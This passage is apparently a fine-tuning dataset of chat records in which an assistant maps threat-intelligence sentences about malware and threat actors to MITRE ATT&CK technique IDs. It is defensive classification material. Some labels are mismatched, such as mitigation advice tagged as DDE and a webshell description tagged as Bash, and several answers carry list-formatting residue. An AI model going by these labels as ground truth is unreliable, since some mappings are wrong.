"content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After completing this wiping functionality, the sample will reboot the system using the following command line, which will render it unusable when the system reboots as the important system locations and files have been overwritten with random data" }, { "role": "assistant", "content": "T1529 - System Shutdown/Reboot" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LaZagne can perform credential dumping from MSCache to obtain account and password information." }, { "role": "assistant", "content": "T1003.005 - OS Credential Dumping: Cached Domain Credentials" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "1) Use PowerShell Constrained Language Mode as it uses IEX, Add-Type, and New-Object. 2) Lock PowerShell Execution Policy, must be set to “AllSigned” via GPO. 3) An allowlisting solution to prevent certain process child-parent execution hierarchies" }, { "role": "assistant", "content": "T1559.002 - Inter-Process Communication: Dynamic Data Exchange" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Okrum's backdoor deletes files after they have been successfully uploaded to C2 servers." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The FIVEHANDS payload is encrypted with AES-128." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Empire contains some modules that leverage API hooking to carry out tasks, such as netripper." }, { "role": "assistant", "content": "T1056.004 - Input Capture: Credential API Hooking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PLATINUM has attempted to get users to open malicious files by sending spearphishing emails with attachments to victims." }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mosquito uses a custom encryption algorithm, which consists of XOR and a stream that is similar to the Blum Blum Shub algorithm." }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "checks for the existence of anti-virus." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Peirates can gain a reverse shell on a host node by mounting the Kubernetes hostPath." }, { "role": "assistant", "content": "T1611 - Escape to Host" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PcShare can capture camera video as part of its collection process." }, { "role": "assistant", "content": "T1125 - Video Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cardinal RAT and its watchdog component are compiled and executed after being delivered to victims as embedded, uncompiled source code." }, { "role": "assistant", "content": "T1027.004 - Obfuscated Files or Information: Compile After Delivery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kimsuky has searched for vulnerabilities, tools, and geopolitical trends on Google search engine to target victims" }, { "role": "assistant", "content": "T1593.002 - Search Engines" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The following command line is a service created by CobaltStrike and can be found in Windows Event Logs (event id 7045). It runs an encoded powershell command" }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses the filename owaauth.dll, which is a legitimate file that normally resides in %ProgramFiles%\\Microsoft\\Exchange Server\\ClientAccess\\Owa\\Auth\\; the malicious file by the same name is saved in %ProgramFiles%\\Microsoft\\Exchange Server\\ClientAccess\\Owa\\bin\\." }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used PowerShell on victim systems to download and run payloads after exploitation." }, { "role": "assistant", "content": "T1064 - Scripting', 'T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PLATINUM has sent spearphishing emails with attachments to victims as its primary initial access vector." }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "POWERSTATS uses character replacement, PowerShell environment variables, and XOR encoding to obfuscate code. POWERSTATS's backdoor code is a multi-layer obfuscated, encoded, and compressed blob. POWERSTATS has used PowerShell code with custom string obfuscation" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A version of Daserf uses the MPRESS packer." }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SysUpdate can use WMI for execution on a compromised host." }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Instead of more traditional malware like a Windows executable (.exe) or Dynamic Link Library (.dll), the malware authors used a browser extension as their final payload" }, { "role": "assistant", "content": "T1176 - Browser Extensions" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT29 has leveraged numerous pieces of malware that appear to be unique to APT29 and were likely developed for or by the group." }, { "role": "assistant", "content": "T1587.001 - Malware" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "For CostaRicto, the threat actors used custom malware, including PS1, CostaBricks, and SombRAT." }, { "role": "assistant", "content": "T1587.001 - Malware" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sandworm Team has run the \"xp_cmdshell\" command in MS-SQL." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "USB Worm -> this is the USBWorm component developed for stealing files from removable drives, spread across systems by infecting removable media, and download and execute the “Thin Client” component from a remote Crimson server" }, { "role": "assistant", "content": "T1091 - Replication Through Removable Media" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Amadey has used HTTP for C2 communications." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Threat Group-3390 has used DLL side-loading, including by using legitimate Kaspersky antivirus variants in which the DLL acts as a stub loader that loads and executes the shell code." }, { "role": "assistant", "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WannaCry uses \"attrib +h\" and \"icacls . /grant Everyone:F /T /C /Q\" to make some of its files hidden and grant all users full access controls." }, { "role": "assistant", "content": "T1222.001 - File and Directory Permissions Modification: Windows File and Directory Permissions Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ABK can extract a malicious Portable Executable (PE) from a photo." }, { "role": "assistant", "content": "T1027.003 - Steganography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HDoor kills anti-virus found on the victim." }, { "role": "assistant", "content": "T1562.001 - Impair Defenses: Disable or Modify Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "cmd /c tasklist: Executes this command to collect a list of running processes on victim’s machine and store them in a tmp file" }, { "role": "assistant", "content": "T1005 - Data from Local System', 'T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can upload and download files to the victim." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "For Linux Rabbit to establish a connection with the C2 server, it utilizes Tor hidden services to act as contact points to access a Tor gateway. The malware will randomly select one of the hidden services and then a Tor gateway to follow in order to establish an active C2 URL. The payload for the malware is then sent from the C2 server as an encoded URL parameter" }, { "role": "assistant", "content": "T1132 - Data Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Shark can send DNS C2 communications using a unique domain generation algorithm." }, { "role": "assistant", "content": "T1568.002 - Domain Generation Algorithms" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bumblebee has been downloaded to victim's machines from OneDrive." }, { "role": "assistant", "content": "T1102 - Web Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DEATHRANSOM can delete volume shadow copies on compromised hosts." }, { "role": "assistant", "content": "T1490 - Inhibit System Recovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Umbreon hides from defenders by hooking libc function calls, hiding artifacts that would reveal its presence, such as the user account it creates to provide access and undermining strace, a tool often used to identify malware." }, { "role": "assistant", "content": "T1014 - Rootkit" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "QakBot can run \"nltest /domain_trusts /all_trusts\" for domain trust discovery." }, { "role": "assistant", "content": "T1482 - Domain Trust Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Heyoka Backdoor can establish persistence with the auto start function including using the value `EverNoteTrayUService`." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "One computer that was infected with both Cadelspy and Remexi was a system that ran a SIM card editing application" }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The malware creates a shortcut %APPDATA%\\dotNET.lnk pointing to the copy of the malware under %APPDATA%." }, { "role": "assistant", "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "As can be seen from the Table 2 above, Kazuar has an extensive command set, many of which are similar in functionality as other backdoor Trojans. However, a few commands specific to Kazuar appear to be unique and are worth further discussion" }, { "role": "assistant", "content": "T1029 - Scheduled Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Figure 7 shows how DCRat collects the public IP address from the compromised host by accessing the IP web service named as “https[:]//ipinfo[.]io/json”." }, { "role": "assistant", "content": "T1590.005 - IP Addresses" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Astaroth uses ActiveX objects for file execution and manipulation." }, { "role": "assistant", "content": "T1218.001 - Signed Binary Proxy Execution: Compiled HTML File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SDBbot has the ability to access the file system on a compromised host." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Rancor has attached a malicious document to an email to gain initial access." }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Get2 has the ability to run executables with command-line arguments." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FLIPSIDE is a simple proxy that creates an outbound RDP connection." }, { "role": "assistant", "content": "T1090 - Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. CTU researchers identified an xxmm builder for xxmm (see Figure 2), which suggests that the threat actors customize the xxmm malware settings based on the target. T-SMB Scan — This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. After a few minutes, execute the malicious file on the system. Use malware to upload the large list of enumerated files to the C2 server. Use downloaders or other malware to send the new list to a compromised host. Use an uploader or other malware to send the archived files to an attacker-controlled server. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity. Use an advanced endpoint threat detection (AETD) solution to monitor activity on network endpoints. Also implement strict security controls for privileged accounts such as Active Directory administrator to prevent access by an unauthorized user" }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "AuditCred can delete files from the system." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This script simply checks the operating system of the victim and downloads the respective payload again using the certutil executable. In this particular instance, the payload is encoded via base64, which certutil decodes. The payload in question is a CAB file that is then unpacked. Finally, the malware executes the extracted install.bat script before deleting the original files and exiting" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Empire can use PsExec to execute a payload on a remote host." }, { "role": "assistant", "content": "T1569.002 - System Services: Service Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used net use to conduct internal discovery of systems. The group has also used quser.exe to identify existing RDP sessions on a victim." }, { "role": "assistant", "content": "T1049 - System Network Connections Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "is heavily obfuscated in many ways, including through the use of spaghetti code in its functions in an effort to confuse disassembly programs. It also uses a custom XOR algorithm to obfuscate code." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BADFLICK: a backdoor that is capable of modifying the file system, generating a reverse shell, and modifying its command and control (C2) configuration. China Chopper: a simple code injection webshell that executes Microsoft .NET code within HTTP POST commands. This allows the shell to upload and download files, execute applications with web server account permissions, list directory contents, access Active Directory, access databases, and any other action allowed by the .NET runtime" }, { "role": "assistant", "content": "T1059.004 - Command and Scripting Interpreter: Bash" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lazarus Group has changed memory protection permissions then overwritten in memory DLL function code with shellcode, which was later executed via KernelCallbackTable hijacking. Lazarus Group has also used shellcode within macros to decrypt and manually map DLLs into memory at runtime." }, { "role": "assistant", "content": "T1620 - Reflective Code Loading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SysUpdate can delete its configuration file from the targeted system." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Zebrocy uses SMTP and POP3 for C2." }, { "role": "assistant", "content": "T1071.003 - Mail Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Denis exploits a security vulnerability to load a fake DLL and execute its code." }, { "role": "assistant", "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "clears the system event logs." }, { "role": "assistant", "content": "T1070 - Indicator Removal on Host" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "VERMIN can perform audio capture." }, { "role": "assistant", "content": "T1123 - Audio Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Industroyer has a data wiper component that enumerates keys in the Registry \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\"." }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Many ZeroT samples can perform UAC bypass by using eventvwr.exe to execute a malicious file." }, { "role": "assistant", "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has the capability to use rm -rf to remove folders and files from the victim's machine." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "If elevated privileges are not obtained, the malware falls back to using the same Windows registry run key as the older mode variant for persistence HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run. However, if the malware is successful in elevating privileges, it begins to enumerate existing Windows services on the host that are configured to run as LocalSystem. The malware selects services that are currently not active and ignores services that launch the executables svchost.exe and lsass.exe. For each service, the malware attempts to take control of the service’s executable — first using icacls.exe with the /reset flag to reset the executable’s permissions, then using takeown.exe with the /F flag to take ownership of the executable" }, { "role": "assistant", "content": "T1007 - System Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Moses Staff has used the commercial tool DiskCryptor." }, { "role": "assistant", "content": "T1588.002 - Tool" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "As shown in Figure 11, after compromising an initial victim's system (patient 0), the threat actors use the Baidu search engine to search for the victim's organization name. They then identify the Exchange server and attempt to install the OwaAuth web shell. If the OwaAuth web shell is ineffective because the victim uses two-factor authentication for webmail, the adversaries identify other externally accessible servers and deploy ChinaChopper web shells. Within six hours of entering the environment, the threat actors compromised multiple systems and stole credentials for the entire domain" }, { "role": "assistant", "content": "T1003.002 - OS Credential Dumping: Security Account Manager', 'T1003.004 - OS Credential Dumping: LSA Secrets', 'T1003.001 - OS Credential Dumping: LSASS Memory" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LiteDuke can wait 30 seconds before executing additional code if security software is detected." }, { "role": "assistant", "content": "T1497.003 - Time Based Evasion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "USBferry can copy its installer to attached USB storage devices." }, { "role": "assistant", "content": "T1091 - Replication Through Removable Media" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "It downloads the file to the infected machine from the input URL using BITSAdmin, and is called every time the script attempts to download a file" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A noteworthy addition to the Poseidon toolkit is the IGT supertool (Information Gathering toolkit), a bulking 15 megabyte executable that orchestrates a series of different information collections steps, exfiltration, and the cleanup of components" }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This screenshot is via an RDP session as indicated by the tab located at the top of the screen and is located at 164.132.67[.]216 which is hosted by OVH" }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During C0015, the threat actors used a malicious HTA file that contained a mix of encoded HTML and JavaScript/VBScript code." }, { "role": "assistant", "content": "T1059.007 - Command and Scripting Interpreter: JavaScript" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can obtain passwords from common browsers and FTP clients." }, { "role": "assistant", "content": "T1003 - OS Credential Dumping', 'T1552.001 - Unsecured Credentials: Credentials In Files" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Threat Group-3390 has used a variety of Web shells." }, { "role": "assistant", "content": "T1505.003 - Server Software Component: Web Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Exploits Print Nightmare vulnerability." }, { "role": "assistant", "content": "T1068 - Exploitation for Privilege Escalation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MarkiRAT can obtain the computer name from a compromised host." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Inception has maintained persistence by modifying Registry run key value \n \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\\"." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The shellcode executed by this PowerShell is the exact same as in the delivery documents, using code from Metasploit which can obtain additional shellcode to execute using an HTTP request to the following URL: http://www7.chrome-up[.]date/0m5EE We were not able to retrieve the shellcode hosted at this URL" }, { "role": "assistant", "content": "T1071 - Application Layer Protocol', 'T1064 - Scripting', 'T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LightNeuron can be configured to automatically exfiltrate files under a specified directory." }, { "role": "assistant", "content": "T1020 - Automated Exfiltration" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Cobalt Strike System Profiler can discover applications through the browser and identify the version of Java the target has." }, { "role": "assistant", "content": "T1518 - Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "UNC2452 has used WinRM via PowerShell to execute command and payloads on remote hosts." }, { "role": "assistant", "content": "T1021.006 - Remote Services: Windows Remote Management" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Attor's has a plugin that captures screenshots of the target applications." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DCSrv has a function to sleep for two hours before rebooting the system." }, { "role": "assistant", "content": "T1529 - System Shutdown/Reboot" } ] }, { "messages": [ { "role": "system", "content": 